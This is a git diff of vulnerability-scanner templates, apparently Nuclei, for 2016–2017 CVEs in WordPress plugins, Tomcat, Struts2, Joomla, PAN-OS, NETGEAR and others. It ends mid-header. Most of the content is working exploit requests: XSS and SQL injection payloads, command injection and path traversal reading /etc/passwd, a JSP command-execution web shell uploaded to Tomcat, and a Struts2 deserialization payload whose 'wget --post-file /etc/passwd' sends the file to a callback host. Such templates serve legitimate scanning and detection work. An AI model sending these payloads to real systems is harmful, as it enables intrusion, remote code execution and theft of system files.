+id: CVE-2016-1000154 +info: + name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin whizz v1.0. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 + - https://wordpress.org/plugins/whizz + - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000154 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2016-10940-2757.yaml b/poc/cve/cve-2016-10940-2757.yaml deleted file mode 100644 index 09a4757397..0000000000 --- a/poc/cve/cve-2016-10940-2757.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2016-10940 -info: - name: WordPress zm-gallery plugin 1.0 SQL Injection - author: cckuailong,daffainfo - severity: high - description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. - reference: - - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 - - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2016-10940 - cwe-id: CWE-89 - tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 - Host: {{Hostname}} - - | - GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 - Host: {{Hostname}} - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200' - - 'contains(body_2, "[zm_gallery id=")' - - 'contains(body_2, "")' - - '!contains(body_3, "")' - condition: and - -# Enhanced by mp on 2022/04/12 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml deleted file mode 100644 index 86c405ed7a..0000000000 --- a/poc/cve/cve-2016-6210.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2016-6210 - -info: - name: OpenSSH username enumeration < v7.3 - author: iamthefrogy,forgedhallpass - severity: medium - tags: network,openssh - description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. - reference: - - http://seclists.org/fulldisclosure/2016/Jul/51 - - https://security-tracker.debian.org/tracker/CVE-2016-6210 - - http://openwall.com/lists/oss-security/2016/08/01/2 - - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2016-6210 - cwe-id: CWE-200 - -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - - matchers: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - - extractors: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2016-7552-2812.yaml b/poc/cve/cve-2016-7552-2812.yaml deleted file mode 100644 index 140a337d54..0000000000 --- a/poc/cve/cve-2016-7552-2812.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-7552 -info: - name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass - author: dwisiswant0 - severity: critical - description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. - reference: - - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 - - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6 - - http://www.securityfocus.com/bid/97599 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2016-7552 - cwe-id: CWE-22 - tags: cve,cve2016,lfi,auth,bypass -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/logoff.cgi" - headers: - Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Memory map" - part: body - -# Enhanced by mp on 2022/05/10 diff --git a/poc/cve/cve-2017-12542-2884.yaml b/poc/cve/cve-2017-12542-2884.yaml new file mode 100644 index 0000000000..e6b40b0d91 --- /dev/null +++ b/poc/cve/cve-2017-12542-2884.yaml @@ -0,0 +1,38 @@ +id: CVE-2017-12542 + +info: + name: ILO4 Authentication bypass + author: pikpikcu + severity: critical + description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + - https://www.exploit-db.com/exploits/44005 + tags: cve,cve2017,ilo4,hpe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-12542 + +requests: + - method: GET + path: + - "{{BaseURL}}/rest/v1/AccountService/Accounts" + headers: + Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + matchers-condition: and + matchers: + - type: word + words: + - "iLO User" + part: body + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2017-12615.yaml b/poc/cve/cve-2017-12615.yaml deleted file mode 100644 index da8f4861a7..0000000000 --- a/poc/cve/cve-2017-12615.yaml +++ /dev/null @@ -1,70 +0,0 @@ -id: CVE-2017-12615 - -info: - name: Apache Tomcat Servers - Remote Code Execution - author: pikpikcu - severity: high - description: | - Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request. - remediation: | - Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat. - reference: - - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 - - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E - - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12615 - - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 - cve-id: CVE-2017-12615 - cwe-id: CWE-434 - epss-score: 0.96923 - epss-percentile: 0.9965 - cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: tomcat - shodan-query: title:"Apache Tomcat" - tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive - -http: - - method: PUT - path: - - "{{BaseURL}}/poc.jsp/" - - body: | - <%@ page import="java.util.*,java.io.*"%> - <% - if (request.getParameter("cmd") != null) { - out.println("Command: " + request.getParameter("cmd") + "
"); - Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); - OutputStream os = p.getOutputStream(); - InputStream in = p.getInputStream(); - DataInputStream dis = new DataInputStream(in); - String disr = dis.readLine(); - while ( disr != null ) { - out.println(disr); - disr = dis.readLine(); - } - } - %> - - headers: - Content-Type: application/x-www-form-urlencoded - - - method: GET - path: - - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100edc9250058f3f884a3fef19576fe38659fad0a56a0087578ca251c8334aaa6550220204df971b738b9fabb312f64dffe19c1990977b41b333502f73de2b148004738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2017-14535-2928.yaml b/poc/cve/cve-2017-14535-2928.yaml deleted file mode 100644 index 8cc11f11f1..0000000000 --- a/poc/cve/cve-2017-14535-2928.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2017-14535 - -info: - name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability - author: pikpikcu - severity: high - reference: - - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - - https://www.exploit-db.com/exploits/49913 - tags: cve,cve2017,trixbox,rce,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-14535 - cwe-id: CWE-78 - description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." - -requests: - - raw: - - | - GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: de,en-US;q=0.7,en;q=0.3 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: close - Cache-Control: max-age=0 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-15647-2955.yaml b/poc/cve/cve-2017-15647-2955.yaml deleted file mode 100644 index b6d671f5a6..0000000000 --- a/poc/cve/cve-2017-15647-2955.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2017-15647 -info: - name: FiberHome - Directory Traversal - author: daffainfo - severity: high - description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - reference: - - https://www.exploit-db.com/exploits/44054 - - https://www.cvedetails.com/cve/CVE-2017-15647 - - https://blogs.securiteam.com/index.php/archives/3472 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-15647 - cwe-id: CWE-22 - tags: cve,cve2017,lfi,router -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-15944-2965.yaml b/poc/cve/cve-2017-15944-2965.yaml new file mode 100644 index 0000000000..f69b9b9ad5 --- /dev/null +++ b/poc/cve/cve-2017-15944-2965.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-15944 +info: + name: Palo Alto Network PAN-OS - Remote Code Execution + author: emadshanab,milo2012 + severity: critical + description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + reference: + - https://www.exploit-db.com/exploits/43342 + - https://security.paloaltonetworks.com/CVE-2017-15944 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-15944 + tags: cve,cve2017,rce,vpn,panos,globalprotect +requests: + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; + matchers-condition: and + matchers: + - type: word + part: body + words: + - "@start@Success@end@" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/poc/cve/cve-2017-17451-2983.yaml b/poc/cve/cve-2017-17451-2983.yaml deleted file mode 100644 index 0ce0fc0daf..0000000000 --- a/poc/cve/cve-2017-17451-2983.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2017-17451 -info: - name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - - https://wordpress.org/plugins/wp-mailster/#developers - - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html - - https://wpvulndb.com/vulnerabilities/8973 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-17451 - cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-18536-2995.yaml b/poc/cve/cve-2017-18536-2995.yaml deleted file mode 100644 index 931dee4892..0000000000 --- a/poc/cve/cve-2017-18536-2995.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2017-18536 -info: - name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. - reference: - - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - - https://wordpress.org/plugins/stop-user-enumeration/#developers - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-18536 - cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-3528-3012.yaml b/poc/cve/cve-2017-3528-3012.yaml deleted file mode 100644 index 6b985fcdae..0000000000 --- a/poc/cve/cve-2017-3528-3012.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2017-3528 -info: - name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect - author: 0x_Akoko - severity: medium - description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.' - reference: - - https://blog.zsec.uk/cve-2017-3528/ - - https://www.exploit-db.com/exploits/43592 - - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2017-3528 - cwe-id: CWE-601 - tags: cve,cve2017,oracle,redirect -requests: - - method: GET - path: - - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" - matchers: - - type: word - words: - - 'noresize src="/\example.com?configName=' - part: body - -# Enhanced by mp on 2022/04/14 diff --git a/poc/cve/cve-2017-5487.yaml b/poc/cve/cve-2017-5487.yaml deleted file mode 100644 index fb218d1b4e..0000000000 --- a/poc/cve/cve-2017-5487.yaml +++ /dev/null @@ -1,67 +0,0 @@ -id: CVE-2017-5487 - -info: - name: WordPress Core <4.7.1 - Username Enumeration - author: Manas_Harsh,daffainfo,geeknik,dr0pd34d - severity: medium - description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request. - remediation: | - Update WordPress to version 4.7.1 or later - reference: - - https://www.exploit-db.com/exploits/41497 - - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ - - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - - http://www.openwall.com/lists/oss-security/2017/01/14/6 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2017-5487 - cwe-id: CWE-200 - epss-score: 0.97179 - epss-percentile: 0.99764 - cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: wordpress - product: wordpress - shodan-query: http.component:"WordPress" - tags: cve,cve2017,wordpress,wp,edb - -http: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/users/" - - "{{BaseURL}}/?rest_route=/wp/v2/users/" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"id":' - - '"name":' - - '"avatar_urls":' - condition: and - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 - - extractors: - - type: json - name: "usernames" - json: - - '.[] | .slug' - - '.[].name' - part: body - -# digest: 4a0a0047304502210088c108008f20fad24053aba17b4e6a0b1a3ef03c76227a57bf3df1331883b921022075e239bf86f3c3649c02f55a50e854a30f69684afb3558a5fcd83d2b1c7f4259:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2017-5521-3027.yaml b/poc/cve/cve-2017-5521-3027.yaml new file mode 100644 index 0000000000..1ec3a1db53 --- /dev/null +++ b/poc/cve/cve-2017-5521-3027.yaml @@ -0,0 +1,40 @@ +id: CVE-2017-5521 + +info: + name: NETGEAR Routers - Authentication Bypass + author: princechaddha + severity: high + description: | + NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. + reference: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ + - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability + - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 + - https://www.cvedetails.com/cve/CVE-2017-5521/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2017-5521 + cwe-id: CWE-200 + tags: cve,cve2017,auth-bypass,netgear,router + +requests: + - method: GET + path: + - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "right\">Router\\s*Admin\\s*Username<" + - "right\">Router\\s*Admin\\s*Password<" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/19 diff --git a/poc/cve/cve-2017-5631-3031.yaml b/poc/cve/cve-2017-5631-3031.yaml new file mode 100644 index 0000000000..39c6899af9 --- /dev/null +++ b/poc/cve/cve-2017-5631-3031.yaml @@ -0,0 +1,34 @@ +id: CVE-2017-5631 +info: + name: CaseAware - Cross Site Scripting + author: edoardottt + severity: medium + description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 + - https://www.openbugbounty.org/incidents/228262/ + - https://www.exploit-db.com/exploits/42042/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-5631 + cwe-id: CWE-79 + tags: cve,cve2017,xss,caseaware +requests: + - method: GET + path: + - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'>" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2017-6090-3044.yaml b/poc/cve/cve-2017-6090-3044.yaml deleted file mode 100644 index 38352df854..0000000000 --- a/poc/cve/cve-2017-6090-3044.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2017-6090 - -info: - name: PhpCollab (unauthenticated) Arbitrary File Upload - author: pikpikcu - severity: high - tags: cve,cve2017,phpcollab,rce,fileupload - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-6090 - cwe-id: CWE-434 - description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." - -requests: - - raw: - - | # REQUEST 1 - POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 - - -----------------------------154934846911423734231554128137 - Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" - Content-Type: application/x-php - - - - -----------------------------154934846911423734231554128137-- - - - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "48dbd2384cb6b996fa1e2855c7f0567f" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-7391.yaml b/poc/cve/cve-2017-7391.yaml deleted file mode 100644 index 664a04a732..0000000000 --- a/poc/cve/cve-2017-7391.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2017-7391 - -info: - name: Magmi 0.7.22 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL. - remediation: | - Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability. - reference: - - https://github.com/dweeves/magmi-git/issues/522 - - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip - - https://github.com/dweeves/magmi-git/pull/525 - - https://nvd.nist.gov/vuln/detail/CVE-2017-7391 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-7391 - cwe-id: CWE-79 - epss-score: 0.00195 - epss-percentile: 0.57269 - cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: magmi_project - product: magmi - tags: cve,cve2017,magmi,xss - -http: - - method: GET - path: - - "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"><' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a0047304502204bc17576c68fe07f6f9770192a4c68052f31affbfd406bd8ecc554f63474f3fd022100b9f925fb36412f55a8b884b739601290a92729386e5d44b2594564337c9a808b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2017-8917-3078.yaml b/poc/cve/cve-2017-8917-3078.yaml new file mode 100644 index 0000000000..7bc43442b0 --- /dev/null +++ b/poc/cve/cve-2017-8917-3078.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-8917 +info: + name: Joomla! <3.7.1 - SQL Injection + author: princechaddha + severity: critical + description: | + Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors. + reference: + - https://www.cvedetails.com/cve/CVE-2017-8917/ + - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html + - http://www.securityfocus.com/bid/98515 + - http://www.securitytracker.com/id/1038522 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-8917 + cwe-id: CWE-89 + tags: cve,cve2017,joomla,sqli +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" + matchers: + - type: word + part: body + words: + - "cf79ae6addba60ad018347359bd144d2" + +# Enhanced by mp on 2022/05/11 diff --git a/poc/cve/cve-2017-9805-3104.yaml b/poc/cve/cve-2017-9805-3104.yaml new file mode 100644 index 0000000000..c60d7eebd9 --- /dev/null +++ b/poc/cve/cve-2017-9805-3104.yaml @@ -0,0 +1,93 @@ +id: CVE-2017-9805 +info: + name: Apache Struts2 S2-052 - Remote Code Execution + author: pikpikcu + severity: high + description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. + reference: + - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html + - https://struts.apache.org/docs/s2-052.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2017-9805 + cwe-id: CWE-502 + tags: cve,cve2017,apache,rce,struts +requests: + - method: POST + path: + - "{{BaseURL}}/struts2-rest-showcase/orders/3" + - "{{BaseURL}}/orders/3" + headers: + Content-Type: application/xml + body: | + + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + {{interactsh-url}} + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + + matchers-condition: and + matchers: + - type: word + words: + - "Debugging information" + - "com.thoughtworks.xstream.converters.collections.MapConverter" + condition: and + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/poc/cve/cve-2017-9822-3106.yaml b/poc/cve/cve-2017-9822-3106.yaml new file mode 100644 index 0000000000..09de04f19d --- /dev/null +++ b/poc/cve/cve-2017-9822-3106.yaml @@ -0,0 +1,36 @@ +id: CVE-2017-9822 + +info: + name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + author: milo2012 + severity: high + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) + tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization + reference: https://github.com/murataydemir/CVE-2017-9822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-9822 + cwe-id: CWE-20 + +requests: + - raw: + - | + GET /__ HTTP/1.1 + Host: {{Hostname}} + Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest + Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini + + matchers-condition: and + matchers: + - type: word + words: + - '[extensions]' + - 'for 16-bit app support' + part: body + condition: and + + - type: status + status: + - 404 diff --git a/poc/cve/cve-2018-1000129.yaml b/poc/cve/cve-2018-1000129.yaml new file mode 100644 index 